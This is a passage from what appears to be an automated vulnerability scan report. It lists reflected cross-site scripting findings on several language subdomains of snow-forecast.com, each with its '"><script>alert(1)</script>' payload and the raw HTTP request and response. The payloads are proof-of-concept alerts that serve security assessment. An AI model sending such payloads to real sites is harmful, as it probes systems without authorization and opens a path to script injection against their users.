The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad8ec"><script>alert(1)</script>7da74cc4f71 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3Ead8ec"><script>alert(1)</script>7da74cc4f71 HTTP/1.1 Host: it.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "14522afca3d59ba0db052dff9b0696ba" X-Runtime: 64 Content-Length: 19324 Set-Cookie: sfcsid=5d1cd480d0fef7bad53fe96c3b8a881f; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.46. http://it.snow-forecast.com/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83be8"><script>alert(1)</script>ee6a63cf745 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?83be8"><script>alert(1)</script>ee6a63cf745=1 HTTP/1.1 Host: it.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:48 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "b5c5a86cbc6da2e4fe96d10ce382b562" X-Runtime: 219 Content-Length: 18273 Set-Cookie: sfcsid=b18a1e01746006a61b4a2ae1593e914d; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.47. http://it.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.snow-forecast.com
Path:
/newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 268cf"><script>alert(1)</script>0f9467c11c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?268cf"><script>alert(1)</script>0f9467c11c3=1 HTTP/1.1 Host: it.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:49 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "1f5f3384743ec3e6555dcc853f225773" X-Runtime: 74 Content-Length: 27786 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.48. http://it.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://it.snow-forecast.com
Path:
/resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6c291"><script>alert(1)</script>16cc291156f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?6c291"><script>alert(1)</script>16cc291156f=1 HTTP/1.1 Host: it.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:12:50 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "b962b690c58bdab96b14dd7866d46960" X-Runtime: 137 Content-Length: 42294 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:12:50 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.49. http://nl.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://nl.snow-forecast.com
Path:
/iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64c65"><script>alert(1)</script>6927d3ff734 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?64c65"><script>alert(1)</script>6927d3ff734=1 HTTP/1.1 Host: nl.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:25 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "f4f90e36741977a21cfb834f7c68e82c" X-Runtime: 467 Content-Length: 24151 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88573"><script>alert(1)</script>c4bc2c9668e was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'88573"><script>alert(1)</script>c4bc2c9668e HTTP/1.1 Host: nl.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:25 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "d613cf2e2eabac45ee229faff92a1759" X-Runtime: 55 Content-Length: 18114 Set-Cookie: sfcsid=c2e85833b3bae34b63ba7c35bc190f06; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5510"><script>alert(1)</script>20ae1894665 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3Ea5510"><script>alert(1)</script>20ae1894665 HTTP/1.1 Host: nl.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:26 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "50ccf403054a35366e6b371dc1ce2abc" X-Runtime: 84 Content-Length: 19179 Set-Cookie: sfcsid=4f51b0dbb25d3c425be45b9fa8780719; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.52. http://nl.snow-forecast.com/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://nl.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9b5f"><script>alert(1)</script>79b751c11bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?c9b5f"><script>alert(1)</script>79b751c11bf=1 HTTP/1.1 Host: nl.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:24 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "0423c8a162992e3c6941e8d8bc5e09d6" X-Runtime: 66 Content-Length: 18089 Set-Cookie: sfcsid=9b19fd8a97e3211b3a2394e6eae1d64b; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.53. http://nl.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://nl.snow-forecast.com
Path:
/newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64bd5"><script>alert(1)</script>9b9ef43a6dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?64bd5"><script>alert(1)</script>9b9ef43a6dd=1 HTTP/1.1 Host: nl.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:26 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "2b7175f6f062c66a5fe061833510ae8a" X-Runtime: 119 Content-Length: 27622 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.54. http://nl.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://nl.snow-forecast.com
Path:
/resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11427"><script>alert(1)</script>2ebdb6c1c4c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?11427"><script>alert(1)</script>2ebdb6c1c4c=1 HTTP/1.1 Host: nl.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:28 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "5033551d6749a1acf4db97d8f8e7786d" X-Runtime: 123 Content-Length: 42344 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:13:28 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.55. http://pt.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pt.snow-forecast.com
Path:
/iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64e0e"><script>alert(1)</script>d337a7dc4d8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?64e0e"><script>alert(1)</script>d337a7dc4d8=1 HTTP/1.1 Host: pt.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "53d9658c2ed7183672d22e4d22b9eeec" X-Runtime: 46 Content-Length: 24319 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac6d9"><script>alert(1)</script>6327b21d49f was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'ac6d9"><script>alert(1)</script>6327b21d49f HTTP/1.1 Host: pt.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "504eda5f1ce6ae18ebf0967b1af2b45f" X-Runtime: 55 Content-Length: 18179 Set-Cookie: sfcsid=da2f770113ec05042498b4fa798737fe; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a099"><script>alert(1)</script>9515d82a89a was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E3a099"><script>alert(1)</script>9515d82a89a HTTP/1.1 Host: pt.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "d121265e6f957dd70e6f62b70d44873c" X-Runtime: 56 Content-Length: 19351 Set-Cookie: sfcsid=b1a13249d50ddc582b507cc1f69d8ab6; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.58. http://pt.snow-forecast.com/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pt.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfde7"><script>alert(1)</script>96fb2414259 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?bfde7"><script>alert(1)</script>96fb2414259=1 HTTP/1.1 Host: pt.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "03ede3f654325c8411b37fec3e855b57" X-Runtime: 80 Content-Length: 18167 Set-Cookie: sfcsid=2ad7fcbdc68929437e4b5c08e3b6d174; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.59. http://pt.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pt.snow-forecast.com
Path:
/newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b40f4"><script>alert(1)</script>34f1e30ccfb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?b40f4"><script>alert(1)</script>34f1e30ccfb=1 HTTP/1.1 Host: pt.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "2ffc37843801c8085b20dbdb7ef764a1" X-Runtime: 71 Content-Length: 27720 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.60. http://pt.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://pt.snow-forecast.com
Path:
/resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload df355"><script>alert(1)</script>a776ab20b93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?df355"><script>alert(1)</script>a776ab20b93=1 HTTP/1.1 Host: pt.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "18b4616e7d688e4be117cbf59fc4f587" X-Runtime: 147 Content-Length: 42559 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:13:41 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.61. http://ru.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ru.snow-forecast.com
Path:
/iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d52ad"><script>alert(1)</script>f35f2ae78c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?d52ad"><script>alert(1)</script>f35f2ae78c0=1 HTTP/1.1 Host: ru.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "f779ebc45e3a1d78f79ffb9c7b0b199d" X-Runtime: 48 Content-Length: 25350 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0fd1"><script>alert(1)</script>43f4d995b95 was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'c0fd1"><script>alert(1)</script>43f4d995b95 HTTP/1.1 Host: ru.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "102846ecc2066e4f3db1664cdf475aa5" X-Runtime: 51 Content-Length: 19080 Set-Cookie: sfcsid=3b1beb3bd3fd925c3207e9a2721a4182; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97d86"><script>alert(1)</script>0565c054e4b was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E97d86"><script>alert(1)</script>0565c054e4b HTTP/1.1 Host: ru.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "4682bf979d407eace79303e1e41eabde" X-Runtime: 440 Content-Length: 20207 Set-Cookie: sfcsid=d743baf820e2ad869df5cb8379557505; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.64. http://ru.snow-forecast.com/login [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ru.snow-forecast.com
Path:
/login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b45c6"><script>alert(1)</script>bd98c36dfde was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?b45c6"><script>alert(1)</script>bd98c36dfde=1 HTTP/1.1 Host: ru.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:44 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "94ce25e1441b872ae3436f0f1a861057" X-Runtime: 59 Content-Length: 19128 Set-Cookie: sfcsid=7a6cb5307d1c5fbf7f0a70e92d2861d4; path=/; HttpOnly Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.65. http://ru.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ru.snow-forecast.com
Path:
/newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b12d"><script>alert(1)</script>90f2a24a7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?3b12d"><script>alert(1)</script>90f2a24a7a=1 HTTP/1.1 Host: ru.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:46 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "06a0d3a16f7c71e8a7ab55ea142dad24" X-Runtime: 70 Content-Length: 28573 Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.66. http://ru.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ru.snow-forecast.com
Path:
/resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19386"><script>alert(1)</script>233fca9ff19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?19386"><script>alert(1)</script>233fca9ff19=1 HTTP/1.1 Host: ru.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.8.53 Date: Wed, 09 Feb 2011 22:13:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Status: 200 OK ETag: "4920cc1c30aac9cfae7a6fd7dac1e0a5" X-Runtime: 141 Content-Length: 44205 Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:13:45 GMT Cache-Control: private, max-age=0, must-revalidate
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.67. http://se.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://se.snow-forecast.com
Path:
/iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 978c8"><script>alert(1)</script>369b8bb10a0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?978c8"><script>alert(1)</script>369b8bb10a0=1 HTTP/1.1 Host: se.snow-forecast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
